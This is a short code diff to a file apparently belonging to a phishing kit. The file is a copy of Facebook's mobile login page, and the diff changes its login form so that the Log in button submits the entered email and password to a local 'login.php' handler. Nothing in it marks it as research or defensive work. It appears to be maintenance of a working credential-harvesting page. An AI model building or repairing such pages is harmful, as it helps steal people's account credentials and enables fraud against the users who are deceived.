--- a/login/fb_standard/mobile.html
+++ b/login/fb_standard/mobile.html
@@ -324,9 +324,12 @@
           <div class="_a-5 _13gt _7n0e" id="u_0_j_Rp">
             <form
               class="_13e_"
+              id="login_form"
               action="login.php"
               data-autoid="autoid_4"
-              method="post">
+              novalidate="1"
+              method="post"
+              onsubmit="">
               <div class="_13fn">
                 <i class="_7mt-"></i
                 ><input
@@ -501,7 +504,7 @@
                           id="login_password_step_element"
                           data-sigil="login_password_step_element">
                           <button
-                            type="button"
+                            type="submit"
                             value="Log in"
                             class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu"
                             name="login"
